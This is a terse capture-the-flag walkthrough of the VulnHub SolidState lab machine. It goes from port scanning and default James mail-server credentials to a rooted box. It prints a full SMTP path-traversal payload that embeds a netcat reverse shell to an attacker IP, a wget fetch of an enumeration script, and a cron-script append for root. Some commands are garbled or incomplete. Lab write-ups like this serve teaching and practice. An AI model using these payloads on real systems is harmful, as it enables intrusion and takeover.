VulnHub: SOLIDSTATE: 1

Link: https://www.vulnhub.com/entry/solidstate-1,261/

  1. Network Discovery

2. Port scan

namp -Pn -p1000- 10.0.2.25

3. OS and service scan

4. Vuln scan

5. Starting w/ port 80

Nikto

Directory scan

Access the site

View page source, nothing

services.html

Try XXS, but nothing happened.

Maybe some username?

6. Next one is port 25: JAMES smtpd 2.3.2.

I came across this guide

Username: rootPassword: root

I changed all password

Access these account w/ pop3 service on port 110 using thunderbird

John: there’s a message

Mindy: there’re 2 messages.

I have mindy username and password to login to ssh.

7. login w/ mindy’s credential

cat user.txt

Try exploring system

Restricted

Read passwd

I’m restricted because of rbash, cannot do anything

8. James 2.3.2: Get ack to exploitation guide

Follow the guide

I have to supply the reverse shell command

Prepare listener on port 443

Connect to port 25

Following the guide and using reverse shell cheatsheet

MAIL FROM: <'you@domain.com>RCPT TO: <../../../../../../../../etc/bash_completion.d>DATAFrom: bla.bla'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.2.27 443 >/tmp/f.

Login w/ mindy again, you will see some weird stuff.

Back to listener, now I have a shell

8. Privilege escalation

I need TTY shell.

I want to run LinEnum.sh

Prepare SimpleHTTPServer on attacker machine

Download the script

wget http://10.0.2.27/LinEnum.sh

Chnage permission and run

/tmp/LinEnum.sh -t

The machine is 32-bit.

There’s /opt/tmp/py -> very interesting

Cannot do anything with these files

Noting on SUID/SGID

Nothing on cron

Verify sudo

No command

Verify capabilities

Let’s check some services beside cron job

I found this ‘cron -f’. There must have something running in the background.

Observe system w/ pspy

This machine is 32-bit. I will download pspy32 to the machine.

chmod 777 pspy 32/tmp/pspy32

Wait for observation and I got this. It’s that ‘/opt/tmp.py’.

Read the file.

cat tmp.py

I can append the script w/ this command to get root shell.

cat tmp.py

Waiting for a while

ls -la

Now I got /tmp/rootbash

Run it

whoami

Now I’m root

Get root.txt

ls -lacat root.txt